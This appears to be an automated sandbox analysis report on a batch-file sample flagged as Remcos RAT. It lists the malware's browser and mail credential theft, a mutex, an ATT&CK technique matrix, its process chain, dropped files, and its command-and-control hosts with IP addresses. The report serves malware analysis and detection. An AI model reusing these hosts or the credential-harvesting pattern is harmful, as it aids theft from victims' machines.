              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 7_2_0041881C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 8_2_004082CD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0041739B GetVersionExW, 7_2_0041739B

              Stealing of Sensitive Information

              Source: Yara match File source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: ESMTPPassword 8_2_004033F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 8_2_00402DB3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 8_2_00402DB3
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
              Source: Yara match File source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara match  File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ATT&CK Matrix, techniques listed per tactic column (the digits shown next to a technique in the matrix are kept in parentheses):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
              Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: Native API (111); Command and Scripting Interpreter (22); PowerShell (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
              Persistence: Scripting (1); DLL Side-Loading (1); Office Application Startup (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (111); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (121); Access Token Manipulation (1); Process Injection (111); HTML Smuggling
              Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (16); Security Software Discovery (111); Virtualization/Sandbox Evasion (121); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
              Collection: Archive Collected Data (12); Data from Local System (1); Input Capture (11); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Commonly Used Port; Application Layer Protocol; Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
              Behavior Graph ID: 1612239  Sample: tOpxHK0Z2U.bat  Startdate: 11/02/2025  Architecture: WINDOWS  Score: 100

              Process chain shown in the graph: cmd.exe -> cmd.exe (with conhost.exe) -> powershell.exe -> powershell.exe (three child powershell.exe instances), plus 13 other top-level processes and further cmd.exe/conhost.exe children.

              Network contacts shown in the graph:
              abokirem.duckdns.org 37.120.208.40, 49763, 49788, 56379 M247GB Romania (Uses dynamic DNS services)
              0x0.st 168.119.145.117, 443, 49749, 49857 HETZNER-ASDE Germany
              geoplugin.net 178.237.33.50, 49794, 80 ATOM86-ASATOM86NL Netherlands

              Files dropped by powershell.exe:
              C:\Users\user\...\StartupScript_8b2957c5.cmd, ASCII
              C:\ProgramData\remcos\logs.dat, data
              C:\Users\user\AppData\Local\Temp\eguw, Unicode

              Signatures attached to graph nodes: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures; Suspicious powershell command line found; Bypasses PowerShell execution policy; Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process; 2 other signatures; Tries to harvest and steal browser information (history, passwords, etc)
